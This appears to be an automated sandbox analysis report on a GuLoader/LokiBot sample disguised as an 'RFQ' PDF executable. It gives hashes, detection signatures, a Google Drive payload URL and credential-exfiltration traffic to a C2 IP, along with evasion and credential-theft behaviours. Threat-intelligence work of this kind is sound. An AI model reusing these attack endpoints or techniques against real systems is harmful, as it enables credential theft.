Windows Analysis Report RFQ 001030112021#U00b7pdf.exe

Overview

General Information

Sample Name: RFQ 001030112021#U00b7pdf.exe
Analysis ID: 531794
MD5: 754fa9ff30ec6e1cd7a29837adeb7a8b
SHA1: 09472c720424ab26d13b7dd8cc2e199a826a88d1
SHA256: 957ac63b9471fe11ba63a0bca4759741b305525ef1c4a2e4be262ed4464a2935
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
IP address seen in connection with other malware
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1f5uP"}
Multi AV Scanner detection for submitted file
Source: RFQ 001030112021#U00b7pdf.exe Metadefender: Detection: 17% Perma Link
Source: RFQ 001030112021#U00b7pdf.exe ReversingLabs: Detection: 17%
Multi AV Scanner detection for domain / URL
Source: http://63.250.34.171/tickets.php?id=277 Virustotal: Detection: 8% Perma Link
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.RFQ 001030112021#U00b7pdf.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 0.0.RFQ 001030112021#U00b7pdf.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RFQ 001030112021#U00b7pdf.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RFQ 001030112021#U00b7pdf.exe.400000.2.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RFQ 001030112021#U00b7pdf.exe.400000.1.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RFQ 001030112021#U00b7pdf.exe.400000.3.unpack Avira: Label: TR/Dropper.VB.Gen

Compliance:

barindex
Uses 32bit PE files
Source: RFQ 001030112021#U00b7pdf.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 142.250.180.110:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.198.33:443 -> 192.168.2.4:49796 version: TLS 1.2

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49805 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49805 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49805 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49805 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49824 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49824 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49824 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49824 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49825 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49825 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49825 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49825 -> 63.250.34.171:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=1f5uP
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 63.250.34.171 63.250.34.171
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: CONSENT=YES+GB.en-GB+V9+BX
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/tmgkbuuoqg7e2eb3u8b2c66mt8m0nijc/1638356250000/03026244708369606156/*/1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-50-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA495C78Content-Length: 190Connection: close
Source: global traffic HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA495C78Content-Length: 190Connection: close
Source: global traffic HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA495C78Content-Length: 163Connection: close
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 01 Dec 2021 10:57:40 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 01 Dec 2021 10:57:48 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 01 Dec 2021 10:57:52 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892182668.00000000009F2000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmp String found in binary or memory: http://63.250.34.171/tickets.php?id=277
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892182668.00000000009F2000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmp String found in binary or memory: http://63.250.34.171/tickets.php?id=277N
Source: RFQ 001030112021#U00b7pdf.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RFQ 001030112021#U00b7pdf.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892182668.00000000009F2000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RFQ 001030112021#U00b7pdf.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: RFQ 001030112021#U00b7pdf.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: RFQ 001030112021#U00b7pdf.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RFQ 001030112021#U00b7pdf.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: RFQ 001030112021#U00b7pdf.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: RFQ 001030112021#U00b7pdf.exe String found in binary or memory: http://ocsp.digicert.com0O
Source: RFQ 001030112021#U00b7pdf.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp String found in binary or memory: https://doc-00-50-docs.googleusercontent.com/
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892182668.00000000009F2000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmp String found in binary or memory: https://doc-00-50-docs.googleusercontent.com/)
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892182668.00000000009F2000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmp String found in binary or memory: https://doc-00-50-docs.googleusercontent.com/:
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857244757.00000000009EB000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmp String found in binary or memory: https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/tmgkbuuo
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857351180.0000000000A33000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp String found in binary or memory: https://doc-00-50-docs.googleusercontent.com/p
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857351180.0000000000A33000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp String found in binary or memory: https://doc-00-50-docs.googleusercontent.com/t
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895453741.000000001E6F8000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892121972.0000000000987000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892261911.0000000002420000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892121972.0000000000987000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895453741.000000001E6F8000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892121972.0000000000987000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCbJ
Source: RFQ 001030112021#U00b7pdf.exe String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA495C78Content-Length: 190Connection: close
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: CONSENT=YES+GB.en-GB+V9+BX
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/tmgkbuuoqg7e2eb3u8b2c66mt8m0nijc/1638356250000/03026244708369606156/*/1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-50-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 142.250.180.110:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.198.33:443 -> 192.168.2.4:49796 version: TLS 1.2

System Summary:

barindex
Potential malicious icon found
Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Uses 32bit PE files
Source: RFQ 001030112021#U00b7pdf.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_0040131C 0_2_0040131C
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B2725 0_2_020B2725
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9405 0_2_020B9405
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B1A15 0_2_020B1A15
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BEA59 0_2_020BEA59
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BEF41 0_2_020BEF41
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8209 0_2_020B8209
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8215 0_2_020B8215
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8221 0_2_020B8221
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B826D 0_2_020B826D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8279 0_2_020B8279
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8285 0_2_020B8285
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B82ED 0_2_020B82ED
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B82F9 0_2_020B82F9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8308 0_2_020B8308
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8369 0_2_020B8369
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B83E1 0_2_020B83E1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7009 0_2_020B7009
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7015 0_2_020B7015
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7021 0_2_020B7021
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8031 0_2_020B8031
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8086 0_2_020B8086
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B809D 0_2_020B809D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BA09D 0_2_020BA09D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8091 0_2_020B8091
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7095 0_2_020B7095
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B80A9 0_2_020B80A9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BA0B5 0_2_020BA0B5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BD0C6 0_2_020BD0C6
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B70FD 0_2_020B70FD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B70F1 0_2_020B70F1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7103 0_2_020B7103
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8105 0_2_020B8105
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BA119 0_2_020BA119
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B811D 0_2_020B811D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8111 0_2_020B8111
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8129 0_2_020B8129
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BA128 0_2_020BA128
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B712C 0_2_020B712C
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B713D 0_2_020B713D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7149 0_2_020B7149
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7162 0_2_020B7162
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B81B9 0_2_020B81B9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B81C5 0_2_020B81C5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B81DD 0_2_020B81DD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B71DC 0_2_020B71DC
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B81D1 0_2_020B81D1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B81F8 0_2_020B81F8
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8609 0_2_020B8609
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B760D 0_2_020B760D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7619 0_2_020B7619
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8615 0_2_020B8615
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B862D 0_2_020B862D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8621 0_2_020B8621
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7625 0_2_020B7625
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7631 0_2_020B7631
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7664 0_2_020B7664
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B76B9 0_2_020B76B9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B76C5 0_2_020B76C5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B76DD 0_2_020B76DD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B76D1 0_2_020B76D1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B86FC 0_2_020B86FC
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7739 0_2_020B7739
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7745 0_2_020B7745
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B775D 0_2_020B775D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7751 0_2_020B7751
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B776E 0_2_020B776E
